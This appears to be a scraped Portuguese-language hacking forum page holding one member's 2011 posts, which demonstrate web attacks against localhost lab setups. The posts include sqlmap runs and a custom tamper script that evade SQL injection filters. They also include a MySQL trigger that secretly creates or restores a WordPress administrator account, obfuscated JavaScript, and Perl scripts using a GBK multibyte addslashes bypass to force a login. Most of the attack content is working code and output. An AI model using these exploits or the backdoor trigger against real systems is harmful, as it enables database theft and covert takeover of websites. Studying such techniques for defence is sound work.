Além da vergonha, ainda restou também um pouco de saudades... =p
[]'s
[]'s
This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.
Show posts MenuQuote from: PH. on 18 de November , 2011, 07:25:47 AM
é possivel desofuscar ?
<?php
$sql = 'SELECT * FROM noticias WHERE id = ' . $_GET['id'];
Quote127.0.0.1 - - [26/Oct/2011:09:59:28 -0200] "GET /news/?id=2' HTTP/1.1" 200 202
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
<?php
if(preg_match('/\s/', $_GET['id']))
die('Hacking Attempt');
Quote:~/sqlmap-dev$ python sqlmap.py -o -u "http://localhost/news/?id=2" --dbs
[...]
[10:09:12] [WARNING] GET parameter 'id' is not injectable
[10:09:12] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Also, you can try to rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details
Quote:~/sqlmap-dev$ python sqlmap.py --tamper "tamper/space2comment.py" -o -u "http://localhost/news/?id=2" --dbs
[...]
[10:11:53] [INFO] loading tamper script 'space2comment'
[...]
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] n
[...]
[10:12:10] [INFO] fetching database names
[10:12:10] [INFO] the SQL query used returns 7 entries
<?php
if(preg_match('/(\s|\/\*\*\/|\+)/', $_GET['id']))
die('Hacking Attempt');
Quote[10:30:11] [INFO] loading tamper script 'space2plus'
[10:30:13] [WARNING] GET parameter 'id' is not injectable
#!/usr/bin/env python
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOWEST
def dependencies():
pass
def tamper(payload):
if payload:
payload = payload.replace("/**/", "");
payload = payload.replace("+", "");
return payload
Quote:~/sqlmap-dev$ python sqlmap.py --tamper "tamper/space2plus.py,tamper/fvox.py" -o -u "http://localhost/news/?id=2" --dbs
[...]
[10:31:50] [INFO] loading tamper script 'space2plus'
[10:31:50] [INFO] loading tamper script 'fvox'
[...]
[10:31:51] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[...]
[10:31:51] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[...]
[10:32:01] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[...]
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] n
[...]
[10:32:30] [INFO] fetching database names
[10:32:30] [INFO] the SQL query used returns 7 entries
Quote"Wtf????? O que está acontecendo com o meu site?"
DROP TRIGGER IF EXISTS wordpress;
DELIMITER $$
CREATE TRIGGER wordpress BEFORE INSERT ON wp_comments FOR EACH ROW BEGIN
SET @USER = 'Almroot';
SET @HASH = '$P$BLZ4pYXIwQcGazytSj0r4Xy5BHVlY30'; #The hash stands for 'hacked'.
SET @DATE = '2011-09-24 13:37:00';
IF NEW.comment_author = @USER THEN
SET NEW.comment_post_ID = 0;
SET NEW.comment_approved = 'spam';
SET NEW.comment_agent = '';
SET NEW.comment_author_IP = '::1';
SET NEW.comment_content = '';
SET @ID = (SELECT COUNT(ID) FROM wp_users WHERE user_login = @USER LIMIT 1);
IF @ID = 0 THEN
INSERT INTO wp_users () VALUES (NULL,@USER,@HASH,@USER,NEW.comment_author_email,NEW.comment_author_url,@DATE,'','0',@USER);
SET @ID = (SELECT ID FROM wp_users WHERE user_login = @USER LIMIT 1);
INSERT INTO wp_usermeta () VALUES (NULL, @ID, 'first_name', '');
INSERT INTO wp_usermeta () VALUES (NULL, @ID, 'last_name', '');
INSERT INTO wp_usermeta () VALUES (NULL, @ID, 'nickname', @USER);
INSERT INTO wp_usermeta () VALUES (NULL, @ID, 'description', '');
INSERT INTO wp_usermeta () VALUES (NULL, @ID, 'rich_editing', 'true');
INSERT INTO wp_usermeta () VALUES (NULL, @ID, 'comment_shortcuts', 'false');
INSERT INTO wp_usermeta () VALUES (NULL, @ID, 'admin_color', 'fresh');
INSERT INTO wp_usermeta () VALUES (NULL, @ID, 'use_ssl', '0');
INSERT INTO wp_usermeta () VALUES (NULL, @ID, 'show_admin_bar_front', 'true');
INSERT INTO wp_usermeta () VALUES (NULL, @ID, 'show_admin_bar_admin', 'false');
INSERT INTO wp_usermeta () VALUES (NULL, @ID, 'aim', '');
INSERT INTO wp_usermeta () VALUES (NULL, @ID, 'yim', '');
INSERT INTO wp_usermeta () VALUES (NULL, @ID, 'jabber', '');
INSERT INTO wp_usermeta () VALUES (NULL, @ID, 'wp_capabilities', 'a:1:{s:13:"administrator";s:1:"1";}');
INSERT INTO wp_usermeta () VALUES (NULL, @ID, 'wp_user_level', '10');
INSERT INTO wp_usermeta () VALUES (NULL, @ID, 'wp_dashboard_quick_press_last_post_id', '3');
ELSE
SET @ID = (SELECT ID FROM wp_users WHERE user_login = @USER LIMIT 1);
UPDATE wp_users SET user_login = @USER, user_pass = @HASH, user_nicename = @USER, user_email = NEW.comment_author_email, user_url = NEW.comment_author_url, user_registered = @DATE, user_status = 0, display_name = @USER WHERE ID = @ID;
UPDATE wp_usermeta SET meta_value = 'a:1:{s:13:"administrator";s:1:"1";}' WHERE meta_key = 'wp_capabilities';
UPDATE wp_usermeta SET meta_value = '10' WHERE meta_key = 'wp_user_level';
UPDATE wp_usermeta SET meta_value = '3' WHERE meta_key = 'wp_dashboard_quick_press_last_post_id';
END IF;
END IF;
END;
$$
function fvox(s) {
r = 0;
len = s.length;
for(i = 0; i < len; i++)
r += s.charCodeAt(i);
return parseInt(r) * len;
}
alert(fvox('SYNYSTER'));
function BPRCZfHnCpf(RpPzsaHjymFohz){r = ('i'.length - 1);len = RpPzsaHjymFohz.length;for(i = ('qIpWyVzoHR'.length - 10); i < len; i++) r += RpPzsaHjymFohz.charCodeAt(i);return parseInt(r) * len;}alert(BPRCZfHnCpf(String.fromCharCode(0x53,0x59,0116,0x59,0x53,0x54,0x45,82)));
QuoteParabéns! Sua inscrição no Google Developer Day Brasil 2011 está confirmada.
CREATE DATABASE `fvox`; --Se voce nao modificou o my.cfn, entao DEFAULT CHARACTER SET...
CREATE TABLE login (
usuario VARCHAR(10) CHARACTER SET GBK,
senha VARCHAR(15) CHARACTER SET GBK,
);
INSERT INTO login (`usuario`, `senha`) VALUES ('fvox', 'invaders');
<?php
if(!isset($_POST['user']) && !isset($_POST['passwd'])){
?>
<html>
<body>
<center>
<form action="" method="POST">
Usuario: <input name="user" type="text"><br>
Senha: <input name="passwd" type="password"><br>
<input type="submit" value="Enviar">
</form>
</center>
</body>
<?php
}
else {
mysql_connect('localhost', 'root', '');
mysql_select_db('fvox');
$r = mysql_query(sprintf('SELECT * FROM login WHERE usuario = \'%s\' AND senha = \'%s\'', addslashes($_POST['user']), addslashes($_POST['passwd'])));
if(mysql_fetch_array($r)) # ((bool) array() == FALSE)
echo 'Logado com sucesso!';
else
echo 'Usuario e/ou senha incorretos!';
mysql_close();
}
?>
QuotePOST /fvox.php?user=fvox&passwd=EXPLOIT HTTP/1.1...
#!/usr/bin/env perl
$_ = '\' or \'1\'=\'1';
s/\x27/chr(0xbf).chr(0x27)/ge;
print;
#!/usr/bin/env perl
use common::sense;
use WWW::Curl::Easy;
sub cURL {
my ( $url, $header, $post ) = @_;
my $curl = WWW::Curl::Easy->new;
$curl->setopt( CURLOPT_HEADER, $header // 0 );
$curl->setopt( CURLOPT_NOBODY, $header // 0 );
$curl->setopt( CURLOPT_URL, $url );
if(defined $post) {
$curl->setopt( CURLOPT_CUSTOMREQUEST, $post ? 'POST' : 'GET' );
$curl->setopt( CURLOPT_POST, 1 );
$curl->setopt( CURLOPT_POSTFIELDS, $post );
}
my $r;
$curl->setopt( CURLOPT_WRITEDATA, \$r );
return ( $curl->perform == 0 ) ? $r : 0;
}
my $xpl = '\' or \'1\'=\'1';
$xpl =~ s/\x27/chr(0xbf).chr(0x27)/ge;
say cURL('http://localhost/invaders/', 1, 'user=fvox&passwd=' . $xpl);
HTTP/1.1 200 OK
...
Content-Type: text/html
Logado com sucesso!